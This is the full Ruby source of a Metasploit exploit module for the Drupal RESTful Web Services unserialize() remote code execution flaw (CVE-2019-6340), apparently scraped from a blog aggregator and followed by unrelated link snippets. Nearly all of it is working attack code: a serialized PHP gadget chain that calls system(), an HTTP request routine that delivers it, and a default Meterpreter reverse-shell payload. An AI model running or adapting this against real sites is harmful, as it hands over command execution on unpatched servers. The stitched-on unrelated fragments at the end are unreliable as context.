##

# This module requires Metasploit: https://metasploit.com/download

# Current source: https://github.com/rapid7/metasploit-framework

##

class MetasploitModule < Msf::Exploit::Remote

  # NOTE: All (four) Web Services modules need to be enabled

  Rank = NormalRanking

  include Msf::Exploit::Remote::HTTP::Drupal

  def initialize(info = {})

    super(update_info(info,

      'Name'               => 'Drupal RESTful Web Services unserialize() RCE',

      'Description'        => %q{

        This module exploits a PHP unserialize() vulnerability in Drupal RESTful

        Web Services by sending a crafted request to the /node REST endpoint.

        As per SA-CORE-2019-003, the initial remediation was to disable POST,

        PATCH, and PUT, but Ambionics discovered that GET was also vulnerable

        (albeit cached). Cached nodes can be exploited only once.

        Drupal updated SA-CORE-2019-003 with PSA-2019-02-22 to notify users of

        this alternate vector.

        Drupal < 8.5.11 and < 8.6.10 are vulnerable.

      },

      'Author'             => [

        'Jasper Mattsson', # Discovery

        'Charles Fol',     # PoC

        'Rotem Reiss',     # Module

        'wvu'              # Module

      ],

      'References'         => [

        ['CVE', '2019-6340'],

        ['URL', 'https://www.drupal.org/sa-core-2019-003'],

        ['URL', 'https://www.drupal.org/psa-2019-02-22'],

        ['URL', 'https://www.ambionics.io/blog/drupal8-rce'],

        ['URL', 'https://github.com/ambionics/phpggc'],

        ['URL', 'https://twitter.com/jcran/status/1099206271901798400']

      ],

      'DisclosureDate'     => '2019-02-20',

      'License'            => MSF_LICENSE,

      'Platform'           => ['php', 'unix'],

      'Arch'               => [ARCH_PHP, ARCH_CMD],

      'Privileged'         => false,

      'Targets'            => [

        ['PHP In-Memory',

          'Platform'       => 'php',

          'Arch'           => ARCH_PHP,

          'Type'           => :php_memory,

          'Payload'        => {'BadChars' => "'"},

          'DefaultOptions' => {

            'PAYLOAD'      => 'php/meterpreter/reverse_tcp'

          }

        ],

        ['Unix In-Memory',

          'Platform'       => 'unix',

          'Arch'           => ARCH_CMD,

          'Type'           => :unix_memory,

          'DefaultOptions' => {

            'PAYLOAD'      => 'cmd/unix/generic',

            'CMD'          => 'id'

          }

        ]

      ],

      'DefaultTarget'      => 0,

      'Notes'              => {

        'Stability'        => [CRASH_SAFE],

        'SideEffects'      => [IOC_IN_LOGS],

        'Reliablity'       => [UNRELIABLE_SESSION], # When using the GET method

        'AKA'              => ['SA-CORE-2019-003']

      }

    ))

    register_options([

      OptEnum.new('METHOD', [true, 'HTTP method to use', 'POST',

                            ['GET', 'POST', 'PATCH', 'PUT']]),

      OptInt.new('NODE',    [false, 'Node ID to target with GET method', 1])

    ])

    register_advanced_options([

      OptBool.new('ForceExploit', [false, 'Override check result', false])

    ])

  end

  def check

    checkcode = CheckCode::Unknown

    version = drupal_version

    unless version

      vprint_error('Could not determine Drupal version')

      return checkcode

    end

    if version.to_s !~ /^8\b/

      vprint_error("Drupal #{version} is not supported")

      return CheckCode::Safe

    end

    vprint_status("Drupal #{version} targeted at #{full_uri}")

    checkcode = CheckCode::Detected

    changelog = drupal_changelog(version)

    unless changelog

      vprint_error('Could not determine Drupal patch level')

      return checkcode

    end

    case drupal_patch(changelog, 'SA-CORE-2019-003')

    when nil

      vprint_warning('CHANGELOG.txt no longer contains patch level')

    when true

      vprint_warning('Drupal appears patched in CHANGELOG.txt')

      checkcode = CheckCode::Safe

    when false

      vprint_good('Drupal appears unpatched in CHANGELOG.txt')

      checkcode = CheckCode::Appears

    end

    # Any further with GET and we risk caching the targeted node

    return checkcode if meth == 'GET'

    # NOTE: Exploiting the vuln will move us from "Safe" to Vulnerable

    token = Rex::Text.rand_text_alphanumeric(8..42)

    res   = execute_command("echo #{token}")

    return checkcode unless res

    if res.body.include?(token)

      vprint_good('Drupal is vulnerable to code execution')

      checkcode = CheckCode::Vulnerable

    end

    checkcode

  end

  def exploit

    if [CheckCode::Safe, CheckCode::Unknown].include?(check)

      if datastore['ForceExploit']

        print_warning('ForceExploit set! Exploiting anyway!')

      else

        fail_with(Failure::NotVulnerable, 'Set ForceExploit to override')

      end

    end

    if datastore['PAYLOAD'] == 'cmd/unix/generic'

      print_warning('Enabling DUMP_OUTPUT for cmd/unix/generic')

      # XXX: Naughty datastore modification

      datastore['DUMP_OUTPUT'] = true

    end

    case target['Type']

    when :php_memory

      # XXX: This will spawn a *very* obvious process

      execute_command("php -r '#{payload.encoded}'")

    when :unix_memory

      execute_command(payload.encoded)

    end

  end

  def execute_command(cmd, opts = {})

    vprint_status("Executing with system(): #{cmd}")

    # https://en.wikipedia.org/wiki/Hypertext_Application_Language

    hal_json = JSON.pretty_generate(

      'link'      => [

        'value'   => 'link',

        'options' => phpggc_payload(cmd)

      ],

      '_links'    => {

        'type'    => {

          'href'  => vhost_uri

        }

      }

    )

    print_status("Sending #{meth} to #{node_uri} with link #{vhost_uri}")

    res = send_request_cgi({

      'method'   => meth,

      'uri'      => node_uri,

      'ctype'    => 'application/hal+json',

      'vars_get' => {'_format' => 'hal_json'},

      'data'     => hal_json

    }, 3.5)

    return unless res

    case res.code

    # 401 isn't actually a failure when using the POST method

    when 200, 401

      print_line(res.body) if datastore['DUMP_OUTPUT']

      if meth == 'GET'

        print_warning('If you did not get code execution, try a new node ID')

      end

    when 404

      print_error("#{node_uri} not found")

    when 405

      print_error("#{meth} method not allowed")

    when 422

      print_error('VHOST may need to be set')

    when 406

      print_error('Web Services may not be enabled')

    else

      print_error("Unexpected reply: #{res.inspect}")

    end

    res

  end

  # phpggc Guzzle/RCE1 system id

  def phpggc_payload(cmd)

    (

      # http://www.phpinternalsbook.com/classes_objects/serialization.html

      <<~EOF

        O:24:"GuzzleHttp\\Psr7\\FnStream":2:{

          s:33:"\u0000GuzzleHttp\\Psr7\\FnStream\u0000methods";a:1:{

            s:5:"close";a:2:{

              i:0;O:23:"GuzzleHttp\\HandlerStack":3:{

                s:32:"\u0000GuzzleHttp\\HandlerStack\u0000handler";

                  s:cmd_len:"cmd";

                s:30:"\u0000GuzzleHttp\\HandlerStack\u0000stack";

                  a:1:{i:0;a:1:{i:0;s:6:"system";}}

                s:31:"\u0000GuzzleHttp\\HandlerStack\u0000cached";

                  b:0;

              }

              i:1;s:7:"resolve";

            }

          }

          s:9:"_fn_close";a:2:{

            i:0;r:4;

            i:1;s:7:"resolve";

          }

        }

      EOF

    ).gsub(/\s+/, '').gsub('cmd_len', cmd.length.to_s).gsub('cmd', cmd)

  end

  def meth

    datastore['METHOD'] || 'POST'

  end

  def node

    datastore['NODE'] || 1

  end

  def node_uri

    if meth == 'GET'

      normalize_uri(target_uri.path, '/node', node)

    else

      normalize_uri(target_uri.path, '/node')

    end

  end

  def vhost_uri

    full_uri(

      normalize_uri(target_uri.path, '/rest/type/shortcut/default'),

      vhost_uri: true

    )

  end

end

[EXP]Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit)的更多相关文章

  1. [EXP]Jenkins 2.150.2 - Remote Command Execution (Metasploit)

    ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://gith ...

  2. [EXP]Apache Spark - Unauthenticated Command Execution (Metasploit)

    ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://gith ...

  3. WebStorm 11、PhpStorm 10免费激活(不需要注册码)

    之前分享的WebStorm9.WebStrom10.PhpStorm9注册码生成网站已经被站长关了,比较遗憾!http://my.oschina.net/ximidao/blog/486353 现在官 ...

  4. 下面程序的输出结果是____ A:11,10 B:11,11 C:10,10 D:10,11 int x=10; int y=x++; printf("%d,%d",(x++,y),y++);

    下面程序的输出结果是____ A:11,10 B:11,11 C:10,10 D:10,11 int x=10; int y=x++; printf("%d,%d",(x++,y) ...

  5. ssh The authenticity of host '10.11.26.2 (10.11.26.2)' can't be established

    The authenticity of host '10.11.26.2 (10.11.26.2)' can't be established. ECDSA key fingerprint is SH ...

  6. jenkins git can't work ERROR: Timeout after 10 minutes ERROR: Error fetching remote repo 'origin'

    Started by user Allen Running as Allen Building remotely on MISTestSrv2 (MIS) in workspace C:\jenkin ...

  7. 10 Future Web Trends 十大未来互联网趋势

    转载自:http://blog.sina.com.cn/s/blog_4be577310100ajpb.html 我们很满意自己进入的当前网络纪元,通常被称为Web 2.0.这个阶段互联网的特征包括搜 ...

  8. CXF(2.7.10) - RESTful Services, JSON Support

    在 CXF(2.7.10) - RESTful Services 介绍了 REST 风格的 WebService 服务,数据传输是基于 XML 格式的.如果要基于 JSON 格式传输数据,仅需要将注解 ...

  9. [EXP]Microsoft Windows MSHTML Engine - "Edit" Remote Code Execution

    # Exploit Title: Microsoft Windows (CVE-2019-0541) MSHTML Engine "Edit" Remote Code Execut ...

随机推荐

  1. OpenStack 安装:基本环境准备

    刚刚学完openstack,这几篇文章就算对过去课程的一个总结吧. 首先说说基本的结构:在一台Dell的workstation上面安装了VMware,在VMware上面安装两台CentOS,现在给每台 ...

  2. FloatingActionButton FAB 悬浮按钮

    FloatingActionButton简称FAB,这是一种比较美观的按钮: 1.使用前: FAB代表一个App或一个页面中最主要的操作,如果一个App的每个页面都有FAB,则通常表示该App最主要的 ...

  3. c#: 任务栏进度显示(TaskbarManager)

    Win7及以上系统支持任务栏进度条,为有进度类应用显示进度于任务栏,甚为方便. 以c#之WinForm实现其,大多采用Windows API Code Pack这个方案,加多引用,比较繁琐,而我总也打 ...

  4. Head First Servlets & JSP 学习笔记 第十三章 —— 过滤器的威力

    过滤器可能是最强大的Web应用开发工具了! 与Servlet非常类似,过滤器就是Java组件,请求发送到Servlet之前,可以用过滤器截获和处理请求:另外Servlet结束工作之后,但在响应发回给客 ...

  5. Java 接口多继承

    按照理解,一般都是说Java 类是单继承,但可以实现多个接口.但是可以通过接口来实现类的多继承.(如何通过接口来实现多继承???) 那么就一直以为Java里面是单继承,今天看FutureTask源码的 ...

  6. LWIP学习

    转自:https://blog.csdn.net/kzq_qmi/article/details/46900589 数据包pbuf:    LwIP采用数据结构 pbuf 来描述数据包,其结构如下:  ...

  7. redis 3.2.1 centos7

    设置外网访问 vmare:centos7redis:3.2.1 redis-cli shutdown 重启./redis-server 启动服务 启动之后无法访问 cd redis-3.2.1 vim ...

  8. mysql数据库指定ip远程访问 指定用户 指定数据库

    .登录 mysql -u root -p 之后输入密码进行登陆 .权限设置及说明 .1添加远程ip访问权限 GRANT ALL PRIVILEGES ON *.* TO 'root'@'192.168 ...

  9. maven插件后报错:org.apache.maven.archiver.MavenArchiver.getManifest(org.apache.maven.project

    在给eclipse换了高版本的maven插件后,引入jar包报如下的错误: org.apache.maven.archiver.MavenArchiver.getManifest(org.apache ...

  10. linearlayout 中ImageView 居中等问题

    linearlayout  下的子控件使用android:layout_gravity=”center”  控件居左,没有达到居中的效果, 父窗体只能指定一种控件摆放方向 横向还是竖向 下面我弄了三个 ...